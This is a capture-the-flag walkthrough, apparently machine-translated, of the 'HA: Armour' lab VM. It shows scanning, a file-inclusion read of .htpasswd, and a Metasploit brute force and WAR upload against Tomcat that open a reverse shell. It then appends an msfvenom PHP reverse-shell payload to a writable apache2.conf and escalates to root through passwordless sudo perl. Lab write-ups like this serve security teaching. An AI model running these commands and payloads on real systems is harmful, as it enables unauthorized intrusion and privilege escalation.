Download: point I
bilibili: Point I
collect message
- nmap scan found alive IP is: 192.168.116.140
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_ 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
- 80,8009,8080 open ports, all Web services are Apache httpd, Apache Jserv and Apache Tomcat, as well as a 65534 port ssh service.
- Specifies the port ssh, get the first Flag:
HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
, and tips: TheOlympics
➜ ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
db 88888888ba 88b d88 ,ad8888ba, 88 88 88888888ba
d88b 88 "8b 888b d888 d8"' `"8b 88 88 88 "8b
d8'`8b 88 ,8P 88`8b d8'88 d8' `8b 88 88 88 ,8P
d8' `8b 88aaaaaa8P' 88 `8b d8' 88 88 88 88 88 88aaaaaa8P'
d8YaaaaY8b 88""""88' 88 `8b d8' 88 88 88 88 88 88""""88'
d8""""""""8b 88 `8b 88 `8b d8' 88 Y8, ,8P 88 88 88 `8b
d8' `8b 88 `8b 88 `888' 88 Y8a. .a8P Y8a. .a8P 88 `8b
d8' `8b 88 `8b 88 `8' 88 `"Y8888Y"' `"Y8888Y"' 88 `8b
www.hackingarticles.in
HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
Hint 1: TheOlympics
[email protected]'s password:
- Browser to access port 80, F12 comments found there armour, notes.txt, there are 69, beginning not know what that means. But for TCP / UDP port list are familiar with, you can guess is the port TFTP (Trivial File Transfer Protocol), the detailed TCP / UDP port list .
- You can use nmap add UDP port 69 to determine whether the agreement is open.
➜ ~ sudo nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
- Because you want to send a UDP packet, so to add sudo to execute Root privileges. Finding the target with an open 69 port.
- TFTP client connected to the server to download notes.txt file, get a second flag.
➜ ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
Hint 2: maybeevena
➜ ~
- There is a hint
maybeevena
, not knowing what the hell. Php file suffix before blasting port 80.
➜ ~ dirb http://192.168.116.140 -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)
-----------------
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
- Find file.php, open a blank page, fuzz parameters.
➜ ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000033: 200 28 L 36 W 1437 Ch "file"
Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036
➜ ~
- Find the parameters for the file, or a file read vulnerability, because the Apache service, we first think of reading the Apache-related files, sensitive documents have
.htpasswd
, in general/etc/apache2/.htpasswd
➜ ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
Hint 3: StarBucks
➜ ~
- Find a third flag, and third tips: StarBucks.
- Official Tips:
P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.
- Tip three is to put together: TheOlympics maybeevena starBucks, when forced password.
tomcat get session
- Browser opens port 8080 and found that a Tomcat management page, the password already know, now blasting user name.
➜ CeWL git:(master) ✗ ./cewl.rb -v http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood ([email protected]) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:
Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
- Use CeWL climb port 80 pages generated dictionary user name, log in using the MSF for Tomcat password enumeration.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
- I do not know why, after I restart the server enumerated, the user name is: armour.
[+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
- Tomcat upload Trojan There are many ways you can manually upload WAR file deployment.
- Here on the use of relatively MSF save time.
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
meterpreter >
- Enumerating Local port development
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
- Here found listening on port 8081 on the target host, can only be accessed locally in the target, so we can put forward the port out, MSF, there are built-in.
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
- Now access to your 8081 port can get the fourth flag.
➜ ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
- Or directly on the target host access
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’
index.html 100%[===================>] 56 --.-KB/s in 0s
2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$
Privilege Escalation
- Find GUID file
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
- Find SUID file
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
- Find a writable directory, found / var / www / html
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
- Find the root user permissions can write files
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
- Find
/etc/apache2/apache2.conf
and/opt/tomcat/conf/tomcat-users.xml
file writable. /opt/tomcat/conf/tomcat-users.xml
Only the previous account password, can only see the/etc/apache2/apache2.conf
files.- Find passwd file, each line has been recorded colon (:) correspond to seven fields: user name: password: user ID: Group ID: NOTE description: Main Directory: Shell login
- file corresponding group: Group name: Password: Group ID: the list of all users
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$
tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
- Find a common user aarti and armour
- Apache configuration file to download to your computer, Apache default to www-data user-initiated
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
- Modify users and groups, allowing Apache to start above the ordinary user, why not start with Root user can? Because without recompiling Root privileges are not used, so that Web services also get up. So the only change aarti
- Cover Apache configuration file
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’
apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s
utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
tomcat@ubuntu:/etc/apache2$ cat apache2.conf
- To the directory service at 80 ports write Trojans after writing. (This is the official topic were written), I tried not to create a user file for Tomcat, aarti user can not read the file, it is not accessed, the server reported 500 errors.
- Then I use a file that contains the Apache configuration file to obtain the session.
- Shell is the written Apache2.conf, re-use documents found above contains vulnerabilities.
➜ ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$
Root privileges to mention
- No password list sudo, found a perl
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt
______ ______ _____ _ _ ______
/\ (_____ \ | ___ \ / ___ \ | | | |(_____ \
/ \ _____) )| | _ | || | | || | | | _____) )
/ /\ \ (_____ ( | || || || | | || | | |(_____ (
| |__| | | || || || || |___| || |___| | | |
|______| |_||_||_||_| \_____/ \______| |_|
IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#